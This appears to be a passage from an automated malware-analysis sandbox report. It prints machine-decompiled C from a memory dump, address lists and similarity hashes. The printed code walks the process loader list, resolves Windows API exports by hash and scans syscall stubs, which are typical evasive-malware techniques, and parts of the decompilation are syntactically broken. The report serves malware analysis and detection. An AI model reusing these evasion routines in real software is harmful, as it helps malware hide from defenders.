									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L115:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L122:
										if((_t427[1] & 0x00000004) == 0) {
											L130:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L136;
											} else {
												L133:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L136:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L129:
												_t274 =  &(_t274[1]);
												goto L130;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L127:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L129;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L127;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L122;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L133;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L136;
								}
								L87:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L88;
							}
							if(_t250 != 0x8e) {
								L67:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L88;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L84:
										if(( *_t427 & 0x00000009) != 0) {
											goto L87;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L87;
											}
											goto L88;
										}
										if(_t250 == 0xc5) {
											goto L87;
										}
										if(_t250 == 0x50) {
											goto L84;
										}
									}
									goto L88;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L88;
								} else {
									goto L69;
								}
								while(1) {
									L69:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L88;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L88;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L87;
								}
								goto L88;
							}
							if(_t427[2] == 1) {
								goto L87;
							}
							goto L86;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L87;
							} else {
								goto L88;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L87;
								}
								goto L88;
							} else {
								goto L67;
							}
						}
					}
					if(_t427[3] == 3) {
						L52:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L53;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L53;
							}
							goto L52;
						}
						_t413 = _t413 + 2;
					}
					goto L52;
				}
			}

0x6ed99377
0x6ed9937b
0x6ed99387
0x6ed9938b
0x6ed9938f
0x6ed99394
0x6ed99397
0x6ed99399
0x6ed9939b
0x6ed9939b
0x6ed9939e
0x6ed993a4
0x6ed9941c
0x6ed99420
0x6ed99423
0x6ed99423
0x6ed99426
0x00000000
0x6ed99426
0x6ed993ab
0x6ed99413
0x6ed99417
0x00000000
0x6ed99417
0x6ed993b2
0x6ed9940b
0x6ed9940e
0x00000000
0x6ed9940e
0x6ed993b7
0x6ed993f5
0x6ed993fc
0x6ed993ff
0x6ed993c8
0x6ed993c8
0x6ed993ce
0x00000000
0x00000000
0x6ed993d3
0x6ed993d4
0x6ed993d4
0x6ed99429
0x6ed99429
0x6ed99429
0x6ed99432
0x6ed9943b
0x6ed9943e
0x6ed99441
0x6ed99444
0x6ed99447
0x6ed9944d
0x6ed9948f
0x6ed99492
0x6ed99493
0x6ed9949a
0x6ed9949d
0x6ed9944f
0x6ed99453
0x6ed9945d
0x6ed99464
0x6ed99466
0x6ed9947f
0x6ed99482
0x6ed99482
0x6ed99464
0x6ed994a5
0x6ed994a8
0x6ed994ab
0x6ed994af
0x6ed994b3
0x6ed994bd
0x6ed994c1
0x6ed994cb
0x6ed994d4
0x6ed994e1
0x6ed994e4
0x6ed994e7
0x6ed994e7
0x6ed994f3
0x6ed994fe
0x6ed99504
0x6ed99508
0x6ed994f5
0x6ed994f5
0x6ed994f5
0x6ed99510
0x6ed9953a
0x6ed99540
0x6ed99540
0x6ed99548
0x6ed998f1
0x6ed998f7
0x6ed998fd
0x6ed998fd
0x00000000
0x6ed9954e
0x6ed9954e
0x6ed99552
0x6ed99555
0x6ed99558
0x6ed9955b
0x6ed9955f
0x6ed99561
0x6ed99564
0x6ed99567
0x6ed9956b
0x6ed99570
0x6ed99573
0x6ed99577
0x6ed9957c
0x6ed9957f
0x6ed99581
0x6ed99584
0x6ed99588
0x6ed9958d
0x6ed9959d
0x6ed995a3
0x6ed995a3
0x6ed995ab
0x6ed995ad
0x6ed995b6
0x6ed995b8
0x6ed995bb
0x6ed995c6
0x6ed995f3
0x6ed995c8
0x6ed995df
0x6ed995df
0x6ed995fb
0x6ed99601
0x6ed99607
0x6ed99607
0x6ed995fb
0x6ed995b6
0x6ed9960e
0x6ed9967f
0x6ed99684
0x6ed996dd
0x6ed9979f
0x6ed997a4
0x6ed997b3
0x6ed997b9
0x6ed997bd
0x6ed997c6
0x6ed997cd
0x6ed997d6
0x6ed997e4
0x6ed997e7
0x6ed997cf
0x6ed997cf
0x6ed997cf
0x6ed997cd
0x6ed997f0
0x6ed9981d
0x6ed99830
0x6ed99838
0x6ed9981f
0x6ed99821
0x6ed99829
0x6ed99829
0x6ed997f2
0x6ed997f7
0x6ed99816
0x6ed997f9
0x6ed997fe
0x6ed9980f
0x6ed99800
0x6ed99800
0x6ed99800
0x6ed997fe
0x6ed997f7
0x6ed99840
0x6ed9984f
0x6ed9985c
0x6ed99865
0x6ed99869
0x6ed9986d
0x6ed99870
0x6ed99873
0x6ed99876
0x6ed99879
0x6ed9987c
0x6ed99882
0x6ed99886
0x6ed9988c
0x6ed9988c
0x6ed99882
0x6ed99892
0x6ed998cf
0x6ed998d3
0x6ed998da
0x6ed998e0
0x6ed99894
0x6ed99897
0x6ed998b7
0x6ed998bb
0x6ed998c2
0x6ed998c9
0x6ed99899
0x6ed9989c
0x6ed9989e
0x6ed998a2
0x6ed998ac
0x6ed998b2
0x6ed998b2
0x6ed9989c
0x6ed99897
0x6ed998e7
0x6ed998e7
0x6ed99900
0x6ed99900
0x6ed99906
0x6ed9990b
0x6ed99965
0x6ed9996a
0x6ed999a9
0x6ed999ae
0x6ed999b0
0x6ed999b4
0x6ed999b7
0x6ed999ba
0x6ed999bc
0x6ed999bd
0x6ed999bd
0x6ed999c2
0x6ed999e0
0x6ed999e2
0x6ed999e6
0x6ed999ec
0x6ed999ef
0x6ed999f1
0x6ed999f2
0x6ed999f2
0x00000000
0x6ed999c4
0x6ed999c4
0x6ed999c4
0x6ed999c8
0x6ed999ce
0x6ed999d1
0x6ed999d3
0x6ed999d6
0x6ed999f5
0x6ed999f5
0x6ed999fc
0x6ed99a16
0x6ed999fe
0x6ed999fe
0x6ed99a0a
0x6ed99a0b
0x6ed99a0e
0x6ed99a0e
0x6ed99a24
0x6ed99a24
0x6ed999c2
0x6ed9996f
0x6ed9997d
0x6ed99995
0x6ed99999
0x6ed9999c
0x6ed999a2
0x6ed999a6
0x6ed999a6
0x00000000
0x6ed999a6
0x6ed9997f
0x6ed99983
0x6ed99989
0x6ed99989
0x6ed9998f
0x00000000
0x6ed9998f
0x6ed99971
0x6ed99975
0x00000000
0x6ed99975
0x6ed9990f
0x6ed9993b
0x6ed99953
0x6ed99957
0x6ed9995a
0x6ed9995d
0x6ed9995f
0x6ed99962
0x6ed9993d
0x6ed9993d
0x6ed99941
0x6ed99944
0x6ed99947
0x6ed9994a
0x6ed9994d
0x6ed9994d
0x00000000
0x6ed9993b
0x6ed99915
0x00000000
0x00000000
0x6ed9991b
0x6ed9991f
0x6ed99925
0x6ed99928
0x6ed9992b
0x6ed9992e
0x00000000
0x6ed9992e
0x6ed997a6
0x6ed997aa
0x6ed997b0
0x00000000
0x6ed997b0
0x6ed996e8
0x6ed996fa
0x6ed996ff
0x6ed9976a
0x00000000
0x00000000
0x6ed99771
0x6ed99797
0x6ed9979b
0x00000000
0x00000000
0x6ed9977a
0x6ed9977f
0x6ed99793
0x00000000
0x00000000
0x00000000
0x6ed99795
0x6ed99786
0x00000000
0x00000000
0x6ed9978b
0x00000000
0x00000000
0x6ed9978d
0x00000000
0x6ed99771
0x6ed99701
0x6ed9970b
0x6ed9971c
0x6ed9971f
0x6ed99722
0x6ed99728
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed9972e
0x6ed9972e
0x6ed9972e
0x6ed99735
0x00000000
0x00000000
0x6ed99737
0x6ed9973a
0x6ed99740
0x00000000
0x00000000
0x00000000
0x6ed99742
0x6ed99744
0x6ed9974d
0x00000000
0x00000000
0x6ed99761
0x00000000
0x00000000
0x00000000
0x6ed99763
0x6ed996ef
0x00000000
0x00000000
0x00000000
0x6ed996f5
0x6ed99689
0x6ed996b8
0x6ed996b9
0x6ed996c2
0x00000000
0x6ed996d3
0x00000000
0x6ed996d3
0x6ed99690
0x6ed99693
0x6ed996a6
0x6ed996a7
0x6ed996ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed99693
0x6ed99689
0x6ed99615
0x6ed99672
0x6ed99676
0x6ed9967c
0x00000000
0x6ed9967c
0x6ed99617
0x6ed9961b
0x6ed99628
0x6ed9962c
0x6ed99642
0x6ed9964a
0x6ed9962e
0x6ed99630
0x6ed9963a
0x6ed9963a
0x6ed99650
0x6ed99659
0x6ed99670
0x00000000
0x00000000
0x00000000
0x6ed99670
0x6ed9965b
0x6ed9965b
0x00000000
0x6ed99650

Strings

, xrefs: 6ED999DB

Memory Dump Source

Source File: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Offset: 6ED80000, based on PE: true

Associated: 00000000.00000002.627724979.000000006ED80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627787395.000000006ED9A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.627811416.000000006ED9D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.627821658.000000006ED9F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 6e0421d7a80ca0cd96545921d2743f27ad4aa8dd70a4e37d7fc195db8a67c60f
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: 6422C17040C39ACFD755CF95C8A136ABBE0BF86300F04886EE8E54B291D735D985EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6ED9143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6ED9143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6ED90304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6ed9d208 == 0 ||  *0x6ed9d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6ED94FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6ed9d2f0 |  *0x6ed9d2f1;
									if(( *0x6ed9d2f0 |  *0x6ed9d2f1) == 0) {
										_t525 =  *0x6ed9d208; // 0x2911340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6ed9d2f0 = 1;
											_t526 = E6ED9361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6ED91C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6ed9d208 = _t526;
											 *0x6ed9d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6ED9361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6ED91C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6ED8DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6ED8DFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6ed9d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6ed9d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6ED8E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6ED9306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6ed9d2e4 = 1;
					E6ED8F584( &(_t535[0x38]), 0);
					E6ED8F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6ED8F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6ED9306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6ED8F828( &(_t535[0xc]), E6ED8F4CC( &(_t535[8])) + 0x14);
								_t369 = E6ED8F4BC( &(_t535[0xc]), E6ED8F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6ED8F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6ED8F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6ED8F654( &(_t535[8]));
							E6ED8F654( &(_t535[0x164]));
							E6ED8F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6ED8F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6ED91D34(0x60a28c5c);
							_t290 = E6ED912EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6ED91C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6ED8D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6ED95CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6ED95D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6ED98E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6ED8F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6ED8BB44( &(_t535[0x110]));
							}
							E6ED8CFDC( &(_t535[0x104]));
							E6ED8CFDC(_t518);
							E6ED8CFDC( &(_t535[0x15c]));
							E6ED8CFDC( &(_t535[0x154]));
							E6ED990EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6ED8F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6ED990B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6ED8F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6ED8F4CC( &(_t535[0x44]));
								_t519 =  *(0x6ed9bd40 + _t381 * 4);
								_t531 = E6ED9907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6ED987E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6ED8F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6ED8F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6ED8F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6ED8F828( &(_t535[0x20]), E6ED8F4CC( &(_t535[0x1c])) + 8);
										E6ED8F4BC( &(_t535[0x20]), E6ED8F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6ED9317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6ED8F828( &(_t535[0x48]), _t535[0x70]);
									E6ED9317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6ED8F840( &(_t535[0x44]), _t563);
									E6ED8F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6ED9913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6ED99104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6ED8F654( &(_t535[0x144]));
									E6ED8F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6ed9d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6ED8F654( &(_t535[0x11c]));
							E6ED98E68(_t381,  &(_t535[0xd8]));
							E6ED8F654( &(_t535[0x1c]));
							E6ED8F654( &(_t535[0x44]));
							E6ED8F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6ED8F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6ED8F828( &(_t535[0x38]), E6ED8F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6ED8F4BC( &(_t535[0x38]), E6ED8F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6ED8F4BC( &(_t535[0xc]), _t62);
						_t455 = E6ED8F4BC( &(_t535[0xc]), _t534);
